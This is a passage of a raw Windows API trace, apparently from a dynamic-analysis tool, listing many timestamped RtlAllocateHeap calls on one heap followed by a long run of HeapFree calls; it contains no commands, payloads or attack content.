(HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22496b0 [0111.691] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x225c8c0 [0111.691] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x226fad0 [0111.692] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2282ce0 [0111.692] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2295ef0 [0111.693] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22a9100 [0111.693] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22bc310 [0111.694] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22cf520 [0111.694] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22e2730 [0111.695] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22f5940 [0111.695] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2308b50 [0111.696] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x231bd60 [0111.696] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x232ef70 [0111.697] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2342180 [0111.697] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2f0) returned 0x448b10 [0111.697] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448910 | out: hHeap=0x430000) returned 1 [0111.697] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2355390 [0111.697] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x23685a0 [0111.698] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x237b7b0 [0111.698] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x238e9c0 [0111.698] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x23a1bd0 [0111.698] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x23b4de0 [0111.699] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x23c7ff0 [0111.699] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x23db200 [0111.700] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x23ee410 [0111.700] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2401620 [0111.701] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2414830 [0111.701] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2427a40 [0111.702] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x243ac50 [0111.702] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x244de60 [0111.702] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2461070 [0111.703] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2474280 [0111.703] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2487490 [0111.704] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x249a6a0 [0111.704] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x24ad8b0 [0111.704] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x24c0ac0 [0111.705] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x24d3cd0 [0111.705] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x24e6ee0 [0111.706] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x24fa0f0 [0111.706] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x250d300 [0111.706] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2520510 [0111.707] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2533720 [0111.707] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2546930 [0111.708] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2559b40 [0111.708] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x256cd50 [0111.708] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x257ff60 [0111.710] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2593170 [0111.711] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x468) returned 0x45c5f0 [0111.711] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448b10 | out: hHeap=0x430000) returned 1 [0111.711] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x25a6380 [0111.712] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x25b9590 [0111.712] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x25cc7a0 [0111.713] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x25df9b0 [0111.713] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x25f2bc0 [0111.951] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2610080 [0111.953] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2623290 [0111.953] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26364a0 [0111.954] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26496b0 [0111.955] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x265c8c0 [0111.955] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x266fad0 [0111.956] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2682ce0 [0111.956] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2695ef0 [0111.956] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26a9100 [0111.957] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26bc310 [0111.957] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26cf520 [0111.957] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26e2730 [0111.958] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x26f5940 [0111.958] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2708b50 [0111.959] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x271bd60 [0111.959] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x272ef70 [0111.959] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2742180 [0111.960] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2755390 [0111.961] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x27685a0 [0111.961] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x277b7b0 [0111.962] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x278e9c0 [0111.962] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x27a1bd0 [0111.962] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x27b4de0 [0111.963] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x27c7ff0 [0111.963] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x27db200 [0111.964] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x27ee410 [0111.964] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2801620 [0111.965] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2814830 [0111.965] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2827a40 [0111.965] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x283ac50 [0111.966] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x284de60 [0111.966] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2861070 [0111.966] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2874280 [0111.967] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2887490 [0111.967] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x289a6a0 [0111.968] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x28ad8b0 [0111.968] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x28c0ac0 [0111.968] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x28d3cd0 [0111.969] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x28e6ee0 [0111.969] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x28fa0f0 [0111.970] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x290d300 [0111.970] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2920510 [0111.971] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x698) returned 0x448910 [0111.971] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x45c5f0 | out: hHeap=0x430000) returned 1 [0111.971] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2933720 [0111.971] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2946930 [0111.972] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2959b40 [0111.972] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x296cd50 [0111.972] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x297ff60 [0111.973] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2993170 [0111.973] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x29a6380 [0111.973] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x29b9590 [0111.974] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x29cc7a0 [0111.974] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x29df9b0 [0111.975] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x29f2bc0 [0111.975] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a05dd0 [0111.976] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a18fe0 [0111.976] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a2c1f0 [0111.976] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a3f400 [0111.977] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a52610 [0111.977] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a65820 [0111.978] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a78a30 [0111.978] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a8bc40 [0111.978] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2a9ee50 [0111.979] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ab2060 [0111.979] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ac5270 [0111.980] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ad8480 [0111.980] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2aeb690 [0111.981] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2afe8a0 [0111.981] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b11ab0 [0111.981] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b24cc0 [0111.982] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b37ed0 [0111.982] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b4b0e0 [0111.983] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b5e2f0 [0111.983] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b71500 [0111.983] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b84710 [0111.984] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2b97920 [0111.985] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2baab30 [0111.985] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2bbdd40 [0111.985] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2bd0f50 [0112.233] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2be4160 [0112.234] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2bf7370 [0112.235] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c0a580 [0112.235] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c1d790 [0112.236] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c309a0 [0112.236] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c43bb0 [0112.237] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c56dc0 [0112.237] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c69fd0 [0112.238] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c7d1e0 [0112.238] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2c903f0 [0112.239] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ca3600 [0112.239] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2cb6810 [0112.239] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2cc9a20 [0112.239] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2cdcc30 [0112.240] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2cefe40 [0112.240] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d03050 [0112.241] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d16260 [0112.241] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d29470 [0112.242] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d3c680 [0112.242] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d4f890 [0112.242] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d62aa0 [0112.243] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d75cb0 [0112.243] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d88ec0 [0112.244] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2d9c0d0 [0112.244] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2daf2e0 [0112.244] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2dc24f0 [0112.245] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2dd5700 [0112.246] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2de8910 [0112.246] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e10080 [0112.248] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e23290 [0112.248] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e364a0 [0112.249] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e496b0 [0112.250] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e5c8c0 [0112.250] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e6fad0 [0112.251] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9e0) returned 0x45c5f0 [0112.251] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448910 | out: hHeap=0x430000) returned 1 [0112.251] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e82ce0 [0112.251] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2e95ef0 [0112.252] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ea9100 [0112.252] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ebc310 [0112.253] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ecf520 [0112.254] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ee2730 [0112.255] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2ef5940 [0112.255] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f08b50 [0112.255] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f1bd60 [0112.256] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f2ef70 [0112.257] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f42180 [0112.257] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f55390 [0112.257] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f685a0 [0112.258] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f7b7b0 [0112.258] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2f8e9c0 [0112.499] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x45c5f0 | out: hHeap=0x430000) returned 1 [0119.931] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x467480 | out: hHeap=0x430000) returned 1 [0119.932] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x487280 | out: hHeap=0x430000) returned 1 [0119.932] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x49a490 | out: hHeap=0x430000) returned 1 [0119.932] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4ad6a0 | out: hHeap=0x430000) returned 1 [0119.932] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4c08b0 | out: hHeap=0x430000) returned 1 [0119.932] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4d3ac0 | out: hHeap=0x430000) returned 1 [0119.932] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4e6cd0 | out: hHeap=0x430000) returned 1 [0119.932] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4f9ee0 | out: hHeap=0x430000) returned 1 [0119.932] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x50d0f0 | out: hHeap=0x430000) returned 1 [0119.932] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e10080 | out: hHeap=0x430000) returned 1 [0119.932] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e23290 | out: hHeap=0x430000) returned 1 [0119.932] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e364a0 | out: hHeap=0x430000) returned 1 [0119.932] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e496b0 | out: hHeap=0x430000) returned 1 [0119.932] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e5c8c0 | out: hHeap=0x430000) returned 1 [0119.932] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e6fad0 | out: hHeap=0x430000) returned 1 [0119.933] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e82ce0 | out: hHeap=0x430000) returned 1 [0119.933] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1e95ef0 | out: hHeap=0x430000) returned 1 [0119.933] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1ea9100 | out: hHeap=0x430000) returned 1 [0119.933] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1ebc310 | out: hHeap=0x430000) returned 1 [0119.933] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1ecf520 | out: hHeap=0x430000) returned 1 [0119.933] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x1ee2730 | out: hHeap=0x430000) returned 1 [0119.933] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2010080 | out: hHeap=0x430000) returned 1 [0119.933] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2023290 | out: hHeap=0x430000) returned 1 [0119.933] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20364a0 | out: hHeap=0x430000) returned 1 [0119.933] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20496b0 | out: hHeap=0x430000) returned 1 [0119.933] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x205c8c0 | out: hHeap=0x430000) returned 1 [0120.010] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x206fad0 | out: hHeap=0x430000) returned 1 [0120.012] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2082ce0 | out: hHeap=0x430000) returned 1 [0120.012] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2095ef0 | out: hHeap=0x430000) returned 1 [0120.012] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20a9100 | out: hHeap=0x430000) returned 1 [0120.012] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20bc310 | out: hHeap=0x430000) returned 1 [0120.012] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20cf520 | out: hHeap=0x430000) returned 1 [0120.012] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20e2730 | out: hHeap=0x430000) returned 1 [0120.012] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x20f5940 | out: hHeap=0x430000) returned 1 [0120.012] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2108b50 | out: hHeap=0x430000) returned 1 [0120.335] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x211bd60 | out: hHeap=0x430000) returned 1 [0120.335] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x212ef70 | out: hHeap=0x430000) returned 1 [0120.335] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2142180 | out: hHeap=0x430000) returned 1 [0120.335] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2155390 | out: hHeap=0x430000) returned 1 [0120.335] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21685a0 | out: hHeap=0x430000) returned 1 [0120.335] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x217b7b0 | out: hHeap=0x430000) returned 1 [0120.335] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x218e9c0 | out: hHeap=0x430000) returned 1 [0120.335] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21a1bd0 | out: hHeap=0x430000) returned 1 [0120.335] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21b4de0 | out: hHeap=0x430000) returned 1 [0120.336] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21c7ff0 | out: hHeap=0x430000) returned 1 [0120.336] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21db200 | out: hHeap=0x430000) returned 1 [0120.336] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x21ee410 | out: hHeap=0x430000) returned 1 [0120.336] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2210080 | out: hHeap=0x430000) returned 1 [0120.336] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2223290 | out: hHeap=0x430000) returned 1 [0120.342] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22364a0 | out: hHeap=0x430000) returned 1 [0120.343] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22496b0 | out: hHeap=0x430000) returned 1 [0120.343] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x225c8c0 | out: hHeap=0x430000) returned 1 [0120.343] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x226fad0 | out: hHeap=0x430000) returned 1 [0120.343] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2282ce0 | out: hHeap=0x430000) returned 1 [0120.343] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2295ef0 | out: hHeap=0x430000) returned 1 [0120.343] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22a9100 | out: hHeap=0x430000) returned 1 [0120.343] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22bc310 | out: hHeap=0x430000) returned 1 [0120.343] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22cf520 | out: hHeap=0x430000) returned 1 [0120.344] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22e2730 | out: hHeap=0x430000) returned 1 [0120.344] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x22f5940 | out: hHeap=0x430000) returned 1 [0120.344] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2308b50 | out: hHeap=0x430000) returned 1 [0120.349] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x231bd60 | out: hHeap=0x430000) returned 1 [0120.349] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x232ef70 | out: hHeap=0x430000) returned 1 [0120.349] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2342180 | out: hHeap=0x430000) returned 1 [0120.349] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2355390 | out: hHeap=0x430000) returned 1 [0120.349] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x23685a0 | out: hHeap=0x430000) returned 1 [0120.349] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x237b7b0 | out: hHeap=0x430000) returned 1 [0120.350] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x238e9c0 | out: hHeap=0x430000) returned 1 [0120.350] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x23a1bd0 | out: hHeap=0x430000) returned 1 [0120.350] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x23b4de0 | out: hHeap=0x430000) returned 1 [0120.350] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x23c7ff0 | out: hHeap=0x430000) returned 1 [0120.354] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x23db200 | 